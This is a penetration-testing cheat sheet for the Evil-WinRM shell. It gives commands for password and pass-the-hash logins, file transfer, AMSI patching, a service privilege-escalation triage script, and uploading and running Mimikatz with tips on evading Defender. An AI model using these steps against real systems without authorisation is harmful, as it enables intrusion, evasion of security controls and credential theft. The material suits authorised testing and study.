Evil-WinRM Command List
Evil-WinRM is a Ruby-based Windows Remote Management (WinRM) shell written for penetration testing. It gives you an interactive PowerShell prompt on the target over WinRM (TCP 5985 by default, 5986 over TLS) and adds post-exploitation helpers: file transfer, in-memory .NET execution, DLL loading and AMSI patching. It needs valid credentials (or an NT hash) for an account permitted to use WinRM, normally a local administrator or a member of Remote Management Users.
Top 10 Useful Commands
1. Connect with a Password
evil-winrm -i 10.10.10.10 -u user -p pass
Explanation: Password authentication over plain HTTP on TCP 5985 (the default). Use -P to target a non-default port.
2. Pass The Hash
evil-winrm -i 10.10.10.10 -u user -H <NTLM_HASH>
Explanation: NTLM authentication with the account's NT hash instead of its password. Supply only the 32-hex-character NT half; if your dump shows LM:NT, drop the LM part.
3. Upload File
*Evil-WinRM* PS > upload /local/path/file.exe
Explanation: Built-in upload over the existing WinRM channel, so no certutil, SMB share or HTTP server is needed. An optional second argument sets the remote path; otherwise the file lands in the session's current directory. The transfer is chunked over WinRM and is slow for large files, and anything written to disk is visible to the endpoint's AV.
4. Download File
*Evil-WinRM* PS > download C:\Windows\System32\drivers\etc\hosts
Explanation: Pull a file back over the same channel. An optional second argument sets the local destination; otherwise it is saved in the directory Evil-WinRM was started from.
5. Bypass AMSI
*Evil-WinRM* PS > Bypass-4MSI
Explanation: Patches the Antimalware Scan Interface in the current PowerShell session so scripts that AMSI would flag (PowerView, Invoke-Mimikatz and the like) can be loaded. Run it before loading scripts with -s. It only affects this session's script scanning, not real-time file scanning, and because the technique is well known the patch itself may be detected.
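To confirm whether AMSI is actually scanning your session, before and after Bypass-4MSI, paste the following at the prompt. This is an added example, not part of Evil-WinRM or of the original cheat sheet; it relies on Microsoft's documented AMSI test string, which every AMSI provider is required to report as malicious (the AMSI equivalent of EICAR).

```powershell
# Added example: probe whether AMSI is active in the current PowerShell session.
# Not Evil-WinRM code. Uses the Microsoft-documented AMSI test string, which
# every AMSI provider must flag, so a "blocked" result means AMSI is working.
function Test-AmsiActive {
    # Assemble the string at runtime so this script is not itself flagged
    # when pasted; AMSI only sees the full string when Invoke-Expression
    # submits it for scanning.
    $probe = 'AMSI Test Sample: ' + '7e72c3ce-861b-4339-8740-0ac1484c1386'
    try {
        # With AMSI active the scan happens before parsing and PowerShell
        # raises "This script contains malicious content and has been
        # blocked by your antivirus software".
        Invoke-Expression "'$probe'" | Out-Null
        return $false   # ran without complaint: AMSI is not scanning
    } catch {
        if ($_.FullyQualifiedErrorId -match 'MaliciousContent') {
            return $true    # blocked by AMSI
        }
        throw               # some other failure, surface it
    }
}

if (Test-AmsiActive) {
    'AMSI is active: run Bypass-4MSI before loading scripts'
} else {
    'AMSI is not scanning this session'
}
```

Run it once on connect and again after Bypass-4MSI; if the second run still reports AMSI active, the bypass did not take and loading PowerView will fail.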
6. Menu (Features)
*Evil-WinRM* PS > menu
Explanation: Lists the built-in commands (Bypass-4MSI, Invoke-Binary, Dll-Loader, Donut-Loader, services, upload, download, menu) plus every function exported by scripts you have loaded. Run it again after loading a script to see the new functions.
7. Make Local PowerShell Scripts Available
evil-winrm -i ... -s /path/to/scripts/
Explanation: -s points Evil-WinRM at a local directory of .ps1 files (PowerView, PowerUp, etc.). They are not loaded automatically; each one is loaded on demand from the prompt.
8. Load and Run a Script
*Evil-WinRM* PS > PowerView.ps1
*Evil-WinRM* PS > Get-DomainUser
Explanation: Typing a script's filename (tab completion works) loads it into the session; its functions can then be called directly, as with PowerView's Get-DomainUser here. If loading fails with a malicious-content error, run Bypass-4MSI first.
9. Services
*Evil-WinRM* PS > services
Explanation: Lists every service with its binary path and flags those that are not ACL-protected, i.e. whose binary a low-privileged user may be able to replace. A quick first pass for service-based privilege escalation.
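The services command tells you which entries are worth a second look; the following is a manual version of that triage you can paste into the session. It is an added example and not Evil-WinRM's own implementation: it reports services whose executable the current user can write to, or whose unquoted path contains spaces (both classic hijack conditions), together with the account the service runs as.

```powershell
# Added example: manual triage of Windows services for privilege escalation.
# Not Evil-WinRM code. Reports services whose binary is writable by the
# current user or whose unquoted path contains spaces.
function Get-WeakServices {
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    # Rights that let us replace or retake the binary:
    # WriteData 0x2, Delete 0x10000, WriteDac 0x40000, WriteOwner 0x80000
    $dangerous = 0x2 -bor 0x10000 -bor 0x40000 -bor 0x80000

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if (-not $path) { return }

        # Extract the executable from the command line.
        if     ($path -match '^"([^"]+)"')  { $exe = $Matches[1] }
        elseif ($path -match '^(.*?\.exe)') { $exe = $Matches[1] }
        else   { $exe = ($path -split ' ')[0] }

        # Unquoted path with a space: Windows tries each prefix as an exe.
        $unquoted = ($path -notmatch '^"') -and ($exe -match ' ')

        $writable = $false
        if (Test-Path -LiteralPath $exe) {
            foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                try {
                    $aceSid = $ace.IdentityReference.Translate(
                        [System.Security.Principal.SecurityIdentifier]).Value
                } catch { continue }   # orphaned SID, skip it
                if (($sids -contains $aceSid) -and
                    (([int]$ace.FileSystemRights -band $dangerous) -ne 0)) {
                    $writable = $true
                }
            }
        }

        if ($writable -or $unquoted) {
            [pscustomobject]@{
                Name      = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                Binary    = $exe
                Writable  = $writable
                Unquoted  = $unquoted
            }
        }
    }
}

Get-WeakServices | Format-Table -AutoSize
```

Anything listed with RunsAs LocalSystem and Writable True is a direct path to SYSTEM once you can restart the service or reboot; unquoted-path hits additionally need a writable directory earlier in the path to be exploitable.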
10. SSL
evil-winrm -i 10.10.10.10 -u user -p pass -S
Explanation: Connect over HTTPS (WinRM over TLS). With -S the default port becomes 5986; override it with -P. Needed when the listener only accepts HTTPS. Certificate-based authentication is also available via -c (public key) and -k (private key).
The Workflow This Is Really About
(Interactive):
*Evil-WinRM* PS > upload /path/to/mimikatz.exe
*Evil-WinRM* PS > ./mimikatz.exe
Explanation: Transfer a tool and run it in two prompt entries with no separate transfer channel. Note that these are two separate lines: upload is an Evil-WinRM shell command, not PowerShell, so chaining it with ; does not work (the whole line is parsed as upload arguments). Dropping a well-known binary such as Mimikatz on disk will almost certainly be quarantined by Defender, so stage tooling accordingly. Evil-WinRM is a convenient WinRM post-exploitation shell, not a C2 framework.